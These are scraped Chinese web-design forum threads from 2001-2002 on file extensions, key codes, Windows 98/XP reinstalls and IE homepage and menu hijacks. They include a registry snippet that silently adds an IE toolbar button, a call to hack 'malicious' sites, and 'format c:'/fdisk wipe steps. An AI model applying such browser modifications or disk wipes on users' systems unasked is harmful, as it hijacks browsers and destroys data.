WP WordPerfect文档
WP4 WordPerfect 4文档
WP5 WordPerfect 5文档
WP6 WordPerfect 6文档
WPD WordPerfect文档或演示
WPF 可字处理文档
WPG WordPerfect图形
WPS Microsoft Works文档
WPT WordPerfect模板
WPW Novell PerfectWorks文档
WQ1 Quattro Pro/DOS电子表格
WQ2 Quattro Pro/DOS第5版电子表格
WR1 Lotus Symphony
WRG ReGet文档
WR1 书写器文档
WRK Cakewalk音乐声音工程文件
WRL 虚拟现实模型
WRZ VRML文件对象
WS1 WordStar for Windows 1文档
WS2 WordStar for Windows 2文档
WS3 WordStar for Windows 3文档
WS4 WordStar for Windows 4文档
WS5 WordStar for Windows 5文档
WS6 WordStar for Windows 6文档
WS7 WordStar for Windows 7文档
WSD WordStar 2000文档
WVL Wavelet压缩位图
WWL Microsoft Word内插器文件
X AVS图像格式
XAR CorelXARA绘画
XBM MIME“xbitmap”图像
XI Scream Tracker设备抽样文件
XIF Wang映像文件（Windows 95带有的文件）
XLA Microsoft Excel内插器
XLB Microsoft Excel工具条
XLC Microsoft Excel图表
XLD Microsoft Excel对话框
XLK Microsoft Excel备份
XLL Microsoft Excel内插器文件
XLM Microsoft Excel宏
XLS Microsoft Excel工作单
XLT Microsoft Excel模板
XLV Microsoft Excel VBA模块
XLW Microsoft Excel工作簿/工作区
XM FastTracker 2，Digital Tracker音乐模块（MOD）文件
XNK Microsoft Exchange快捷方式文件
XPM X位图格式
XR1 Epic MegaGames Xargon数据文件
XTP Xtree数据文件
XWD X Windows转储格式
XWF Yamaha XG Works文件（MIDI序列）
XY3 XYWrite Ⅲ文档
XY4 XYWrite Ⅳ文档
XYP XYWrite Ⅲ Plus文档
XYW XYWrite for Windows 4.0文档
X16 宏媒体扩展（程序扩展），16位
X32 宏媒体扩展（程序扩展），32位
YAL Arts& Letters剪贴艺术库
YBK Microsoft Encarta 年鉴
Z UNIX gzip文件
ZAP Windows软件安装配置文件
ZIP Zip文件
ZOO 早前版本的压缩文件
000-999 用于为老版本（或备份）文件编号（比如：被安装程序改变的CONFIG.SYS文件）；又可用于为小范围的PC应用程序的多个用户相关数据文件编号
12M Lotus 1-2-3 97 SmartMaster文件
123 Lotus 1-2-3 97文件
2D VersaCAD的2维绘画文件
2GR，3GR 在Windows之下的VGA图形驱动程序/配置文件
3D VersaCAD的3维绘画文件
3DM 3D NURBS建模器，Rhino
3DS 3D Studio（DOS下）格式文件
386 在386或更高级处理器上使用的文件
4GE Informix 4GL编译后代码
4GL Informix 4GL源代码
669 Composer 669；UNIX Composer音乐模型文件；669磁道模块
#01 及更高的号 为计算机演示而扫描的一系列电影的图片文件编号方法
$$$ OS/2用来跟踪档案文件
@@@ 用于安装过程中的屏幕文件和用于Microsoft Codeview for C这样的应用程序的指导文件 。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-11-24 10:48:18 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
你好厉害，哪里找的？

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
QUESTER

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
 发表于 2001-11-25 13:56:45 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP
推荐使用 File Investigator， 一个文档类型查找软件，就算*.jpg被改为*.txt也一样被识别回来，呵呵，不怕文件被伪装了 [image],也不用害怕MAC的无后缀文件了。

只要拖动需查询文件到软件图标上就可立即查询！

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
上一贴 | 下一贴
快速回复 | 主题：通用文件扩展名详细列表
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


键盘键值

计算机技术
键盘键值

上一贴 | 下一贴
发表人 主题: 键盘键值
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2001-11-19 19:26:52 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 收藏该主题供以后查看 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
在软件开发的过程中我们经常与键盘打交道，以下是我查MSDN 所得希望对各位有帮助。
可在代码中的任何地方用下列值代替键盘上的键：

值 描述
0x1 鼠标左键
0x2 鼠标右键
0x3 CANCEL 键
0x4 鼠标中键
0x8 BACKSPACE 键
0x9 TAB 键
0xC CLEAR 键
0xD ENTER 键
0x10 SHIFT 键
0x11 CTRL 键
0x12 MENU 键
0x13 PAUSE 键
0x14 CAPS LOCK 键
0x1B ESC 键
0x20 SPACEBAR 键
0x21 PAGE UP 键
0x22 PAGE DOWN 键
0x23 END 键
0x24 HOME 键
0x25 LEFT ARROW 键
0x26 UP ARROW 键
0x27 RIGHT ARROW 键
0x28 DOWN ARROW 键
0x29 SELECT 键
0x2A PRINT SCREEN 键
0x2B EXECUTE 键
0x2C SNAPSHOT 键
0x2D INSERT 键
0x2E DELETE 键
0x2F HELP 键
0x90 NUM LOCK 键
A 至 Z 键与 A – Z 字母的 ASCII 码相同：
值 描述
65 A 键
66 B 键
67 C 键
68 D 键
69 E 键
70 F 键
71 G 键
72 H 键
73 I 键
74 J 键
75 K 键
76 L 键
77 M 键
78 N 键
79 O 键
80 P 键
81 Q 键
82 R 键
83 S 键
84 T 键
85 U 键
86 V 键
87 W 键
88 X 键
89 Y 键
90 Z 键
0 至 9 键与数字 0 – 9 的 ASCII 码相同：
值 描述
48 0 键
49 1 键
50 2 键
51 3 键
52 4 键
53 5 键
54 6 键
55 7 键
56 8 键
57 9 键
下列常数代表数字键盘上的键：
值 描述
0x60 0 键
0x61 1 键
0x62 2 键
0x63 3 键
0x64 4 键
0x65 5 键
0x66 6 键
0x67 7 键
0x68 8 键
0x69 9 键
0x6A MULTIPLICATION SIGN (*) 键
0x6B PLUS SIGN (+) 键
0x6C ENTER 键
0x6D MINUS SIGN (–) 键
0x6E DECIMAL POINT (.) 键
0x6F DIVISION SIGN (/) 键
下列常数代表功能键：
值 描述
0x70 F1 键
0x71 F2 键
0x72 F3 键
0x73 F4 键
0x74 F5 键
0x75 F6 键
0x76 F7 键
0x77 F8 键
0x78 F9 键
0x79 F10 键
0x7A F11 键
0x7B F12 键
0x7C F13 键
0x7D F14 键
0x7E F15 键
0x7F F16 键

我笨故我菜！

好好学习，天天向上!

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-20 12:31:53 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
不错呀，收藏了

Blueidea Web Team.
Moderator Of Computer Technology Forum
wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-11-20 13:15:02 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
cjj31在上个帖子中说
引用:
0x7C F13 键
0x7D F14 键
0x7E F15 键
0x7F F16 键

我键盘上没有啊

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-20 13:16:57 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
wx@ay在上个帖子中说
引用:
cjj31在上个帖子中说
引用:
0x7C F13 键
0x7D F14 键
0x7E F15 键
0x7F F16 键

我键盘上没有啊

那是2002年的键盘：)：)

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-11-20 17:01:01 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
wx@ay在上个帖子中说
引用:
cjj31在上个帖子中说
引用:
0x7C F13 键
0x7D F14 键
0x7E F15 键
0x7F F16 键

我键盘上没有啊

可能是power sleep什么的吧

| 收藏贴 |
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-20 17:03:05 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
http://www.kissting.com/forum/showtopic.asp?TOPIC_ID=7640&Forum_ID=21
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2001-11-23 19:19:27 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
不好意思，我没仔细看过，觉得这个有用就发到这里来了！

我笨故我菜！

好好学习，天天向上!

上一贴 | 下一贴
快速回复 | 主题：键盘键值
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于Windows98thOEM第三版

计算机技术
关于Windows98thOEM第三版

上一贴 | 下一贴
发表人 主题: 关于Windows98thOEM第三版
不知道

终级用户
积分：660
发帖：200
来自：
注册：2001-08-17
 发表于 2002-01-07 10:15:37 按此观看不知道的个人资料 按此发邮件给不知道 收藏该主题供以后查看 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
谁用过Windows98thOEM第三版？

据说“修正了一些BUG，新增驱动210，替换IE5.0/5.5SP1，优化桌面18，修正关机错误2，整合DX8.装了以后感觉不错，图标也变好看了（仿XP），都有所改善。”
真的有这些功能吗？

我准备重装机器。但我的机器比较烂，不太适合装WIN 2K。请大家给点建议。

知之为知之，不知为不知！！
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2002-01-07 11:52:05 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
老盖把98补到现在，对于配置不够或喜欢游戏的人，我的看法是：值得一用

等我想想再签
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-07 15:06:07 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
有的机器升级后,会有图标错乱的现象.

Dripping water wears away a stone.
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-07 15:44:52 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
建议采用该版本，因为里头的软件版本都很新
但是不要安装升级文件，改变图标，不伦不类。
不知道

终级用户
积分：660
发帖：200
来自：
注册：2001-08-17
 发表于 2002-01-07 16:39:37 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
Bee007在上个帖子中说
引用:
建议采用该版本，因为里头的软件版本都很新
但是不要安装升级文件，改变图标，不伦不类。

新的驱动都在升级版中呀！可以不改变图标升级吗？

知之为知之，不知为不知！！
上一贴 | 下一贴
快速回复 | 主题：关于Windows98thOEM第三版
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


求助!!IE右键菜单被添了东西怎么改回来!!

计算机技术
求助!!IE右键菜单被添了东西怎么改回来!!

上一贴 | 下一贴
发表人 主题: 求助!!IE右键菜单被添了东西怎么改回来!!
让你笑了

终级用户
积分：472
发帖：123
来自：铁道部
注册：2001-02-26
 发表于 2001-12-07 18:38:58 按此观看让你笑了的个人资料 按此发邮件给让你笑了 让你笑了 的 oicq 是7936350,查看 7936350 的资料 收藏该主题供以后查看 发送悄悄话给让你笑了 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看让你笑了的IP
我浏览网站www.okby.net,退出来的时候才发现IE的右建菜单被改了里面加如了一个cd.okby.net[ok星心BY成都站],只要在IE里就有(点击没有作用),而且还在工具栏生成了一个按钮,就和经典的快速登陆按钮一样,请问这个该如何改回去???
第二就是这个是如何实现的??
如果能的话,经典可以做个页面让想装快速登陆的点击而不必去让人下个400K的ZIP了!!

顺便再问一下,装了QQ后,在从工具栏点击快速登陆按钮,就用QQ的浏览器打开,有什么办法可以不用它打开????

[这消息被让你笑了编辑过(编辑时间2001-12-07 18:42:52)]

阳光照着背,
走着,想起了什么,一转头,笑了!
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-12-07 18:44:43 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
找注册表中：
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

这种问题到计算机技术版去问比较好

[这消息被poorfish编辑过(编辑时间2001-12-07 18:44:18)]

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

让你笑了

终级用户
积分：472
发帖：123
来自：铁道部
注册：2001-02-26
 发表于 2001-12-07 19:01:33 按此观看让你笑了的个人资料 按此发邮件给让你笑了 让你笑了 的 oicq 是7936350,查看 7936350 的资料 发送悄悄话给让你笑了 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看让你笑了的IP
改是改回来了
可是能告诉那个功能如何实现么???
包括向右键添加信息,向工具栏添加信息,和该IE的标题方法一样么???
这样改的工具栏好不象经典的那个快速通道有自己的图标,他是用的一个剪子,系统自带的!

阳光照着背,
走着,想起了什么,一转头,笑了!
LYTKD

终级用户
积分：932
发帖：274
来自：China
注册：2000-12-02
 发表于 2001-12-07 19:44:46 按此观看LYTKD的个人资料 按此发邮件给LYTKD 发送悄悄话给LYTKD 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看LYTKD的IP
让你笑了在上个帖子中说
引用:
改是改回来了
可是能告诉那个功能如何实现么???
包括向右键添加信息,向工具栏添加信息,和该IE的标题方法一样么???
这样改的工具栏好不象经典的那个快速通道有自己的图标,他是用的一个剪子,系统自带的!

同样的原理，看你如何应用了。下面的是在注册表中的内容，可以使用<applet>写到网页中。（这种做法很让人讨厌）其中的Icon和HotIcon就是设置图标地址的

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{C18CB140-0BBB-11D4-8FE8-0088CC102438}]
"ButtonText"="白日梦"
"CLSID"="{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
"Default Visible"="Yes"
"Exec"="http://www.daydream.com"
"HotIcon"="C:\\WINDOWS\\system\\bticon.ico"
"Icon"="C:\\WINDOWS\\system\\bticon.ico"
"MenuStatusBar"="白日梦"
"MenuText"="白日梦"

流浪的小奀
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-07 20:51:54 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
原理
http://www.blueidea.com/bbs/NewsDetail.asp?id=313395

WINDFLASH
::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：求助!!IE右键菜单被添了东西怎么改回来!!
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


谁知道rest：//……是什么协议？

计算机技术
谁知道rest：//……是什么协议？

上一贴 | 下一贴
发表人 主题: 谁知道rest：//……是什么协议？
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-11-20 13:39:33 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
如题，我见朋友在用realplayer播放网络视频是时候地址是rest：//……。请问这是什么协议？？其有什么特点？？？

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-20 13:50:59 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
res:// 还是rest://

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-11-20 13:58:53 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
yunbin在上个帖子中说
引用:
res:// 还是rest://

我记得不是好清楚，两者都存在吗？那请老兄分别说说吧

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-20 14:20:34 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
IE4.0以后版本中有一项新的通信协议 -- res:// （用法一如http://），它是用来注明文件名、执行系统中的 .DLL libraries

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

令狐瓜子

9sun
管理员
积分：5449
发帖：1492
来自：南京
注册：2000-07-07
 发表于 2001-11-20 23:24:18 按此观看令狐瓜子的个人资料 按此发邮件给令狐瓜子 令狐瓜子 的 oicq 是15998803,查看 15998803 的资料 发送悄悄话给令狐瓜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看令狐瓜子的IP
是rtsp吧？在线流式播放啊，

[这消息被令狐瓜子编辑过(编辑时间2001-11-20 23:23:52)]
[这消息被令狐瓜子编辑过(编辑时间2001-11-21 18:49:32)]

独孤八剑

Blueidea Web Team.
Moderator Of Flash Forum

上一贴 | 下一贴
快速回复 | 主题：谁知道rest：//……是什么协议？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教关于更改IE默认页的问题......

计算机技术
请教关于更改IE默认页的问题......

上一贴 | 下一贴
发表人 | 主题: 请教关于更改IE默认页的问题......
birdbird 初级用户 积分：110 发帖：38 来自： 注册：2001-12-06 | 发表于 2001-12-13 09:13:46 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP 我无意中进入一个网站，它竟悄悄将我的IE默认页给改了，而且工具栏“INTERNET选项”中更改默认页的功能也被锁了。虽然影响不大，可我觉得真别扭，它太可恶了。 请教高手该如何解决，谢谢！（我用的WIN2000，用管理员帐号登录的。） 我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
老黑 初级用户 积分：0 发帖：185 来自： 注册：2001-08-20 | 发表于 2001-12-13 10:41:23 按此观看老黑的个人资料 按此发邮件给老黑 发送悄悄话给老黑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看老黑的IP http://www.ay4u.com/regedit/unstarpage.htm
踏浪行歌 终级用户 积分：842 发帖：406 来自：zhongshan 注册：2000-09-03 | 发表于 2001-12-13 11:53:37 按此观看踏浪行歌的个人资料 按此发邮件给踏浪行歌 访问踏浪行歌的主页 踏浪行歌 的 oicq 是7796402,查看 7796402 的资料 发送悄悄话给踏浪行歌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看踏浪行歌的IP 这样的网站有点黑心呀 如果你是注册表菜鸟，建议不要直接去修改 下载一个金山注表修改器就行了 http://www.iduba.net/ 踏浪行歌畅游pc世界 引颈长笑就造一代奔腾 ~~诚聘斑竹呀~~~~斑竹不在多，高手就行~~ [fly]http://www.sihui.net ==浓情天下:文学、交友论坛==[/fly]
DragonsDriver 初级用户 积分：8 发帖：4 来自：上海 注册：2001-12-13 | 发表于 2001-12-13 13:24:03 按此观看DragonsDriver的个人资料 按此发邮件给DragonsDriver DragonsDriver 的 oicq 是14338584,查看 14338584 的资料 发送悄悄话给DragonsDriver 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DragonsDriver的IP 一个简单的方法： 运行--〉regedit--〉edit-->查找 找到了该网址删掉就可以了。
blueonline Blueonline 积分：815 发帖：1676 来自：blue-online. 注册：2000-12-09 | 发表于 2001-12-13 14:28:26 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP http://www.blue-online.net/register/reg_jinjie/weihu_85.htm 流自己的汗，吃自己的饭，靠天、靠地不如自己干。 :::::::bLUE-oNlINE.nET || vERSION 2001 ───────
birdbird 初级用户 积分：110 发帖：38 来自： 注册：2001-12-06 | 发表于 2001-12-14 09:24:50 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP 大侠们，替 天行道 ，该出手时就出手呀！！ 应该组织一个治安纠察队啊，黑掉这些黑心网站。 黑心网站之一：http://www.e-ren.net/ Text 我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
上一贴 | 下一贴
快速回复 | 主题：请教关于更改IE默认页的问题......
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


帮帮忙吧！关于WINDOWS XP的问题

计算机技术
帮帮忙吧！关于WINDOWS XP的问题

上一贴 | 下一贴
发表人 主题: 帮帮忙吧！关于WINDOWS XP的问题
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-07 09:27:10 按此观看kjseven的个人资料 按此发邮件给kjseven 收藏该主题供以后查看 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
我的安装了他，不过问题一大堆呀。
1。是英文版的，可是我装了QQ，就看不到里面中文了，当然浏览网页的时候能看得到中文啦，于是我想装个中文之星，却说中文之星不能运行在NT里面。我应该怎么办啊？
2。我的爱机是原装机，但装了XP之后，我的键盘的另一半和DVD-ROM就不用得了.在选择安装的时候是不是应该选什么啊，升级还是覆盖？
3。用它里面的中文大字，英文和中文切换很麻烦呀，怎好？
4。是不是很多软件不能在它里面运行啊？
5。如何删除特效啊？
6。我现在想删除它，都不可以，不知道为什么。我将98光盘进去，重开机，却不能正确进入安装程序。
谢谢。
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-07 10:34:35 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
1.英文版没事。中文支持到控制面板——区域语言里设置，QQ我从他开始捆绑那个破浏览器后就再没用过（虽然可以删除）
2.你的原装机是什么？键盘我不知道不过一般没那么牛，DVD绝对可以用
3.输入法我一般设置快捷键，切换没问题
4.目前为止，除有个杂牌猫的驱动无法安装外，我未遇到过任何软件不能安装使用，包括游戏（国产游戏没玩过）
5.特效选择：控制面板——系统——高级——性能——设置 里
6.用98启动盘进去，format c：后安装98，如果已经是NTFS则千万不要format c：（你将f掉你的d： ），那么进fdisk删除c：后重建c：

等我想想再签
gate

初级用户
积分：22
发帖：25
来自：浙江
注册：2001-10-30
 发表于 2001-12-07 11:01:19 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP
1、XP下的QQ很慢是正常的,可能为了推荐自己的MSN吧
2、至于语言问题,可以在语言设置修改,也有中文包下载阿
现在都有中文版出来了
你去［url]www.9down.com[/url]看看吧，有你要的东东！！！

享受每一天！
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-07 11:31:31 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
但我现在看不到到一些中文软件啊，例如 QQ,想安装中文之星，却说不能在NT下运行。我能怎做啊？
还有个问题，在它里面，有多少种中文输入法啊〉？
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-07 11:35:03 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
BIGBUG在上个帖子中说
引用:
1.英文版没事。中文支持到控制面板——区域语言里设置，QQ我从他开始捆绑那个破浏览器后就再没用过（虽然可以删除）
2.你的原装机是什么？键盘我不知道不过一般没那么牛，DVD绝对可以用
3.输入法我一般设置快捷键，切换没问题
4.目前为止，除有个杂牌猫的驱动无法安装外，我未遇到过任何软件不能安装使用，包括游戏（国产游戏没玩过）
5.特效选择：控制面板——系统——高级——性能——设置 里
6.用98启动盘进去，format c：后安装98，如果已经是NTFS则千万不要format c：（你将f掉你的d： ），那么进fdisk删除c：后重建c：

如何进fdisk删除c：后重建c，具体步骤？

BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
